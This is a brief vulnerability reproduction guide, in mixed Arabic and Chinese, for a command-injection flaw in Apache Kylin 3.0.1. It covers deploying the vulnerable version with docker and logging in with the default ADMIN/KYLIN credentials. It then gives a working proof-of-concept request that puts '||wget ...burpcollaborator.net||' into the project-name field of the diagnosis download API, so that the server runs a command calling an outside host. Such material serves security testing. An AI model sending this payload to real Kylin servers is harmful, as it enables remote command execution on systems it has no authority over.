
راجع https://github.com/apache/kylin واستخدم docker لنشر البيئة، مع تعديل الإصدار إلى 3.0.1 (الإصدار الذي يحتوي على الثغرة). يمكن إزالة -m 8G \ حيث أن وظيفته هي تحديد حجم الذاكرة المخصصة.
ثم قم بزيارة http://host:7070/kylin/login، اسم المستخدم وكلمة المرور الافتراضيان هما ADMIN/KYLIN.
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
原始请求:
http://host:port/kylin/api/diag/project/learn_kylin/download
PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download
即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||
قم بزيارة System-Configuration-Diagnosis. ثم أطلق الطلب الذي يقوم بتنزيل معلومات التشخيص http://host:port/kylin/api/diag/project/learn_kylin/download

أي استبدل اسم المشروع "learn_kylin" بالحمولة أعلاه ثم قم بالزيارة.
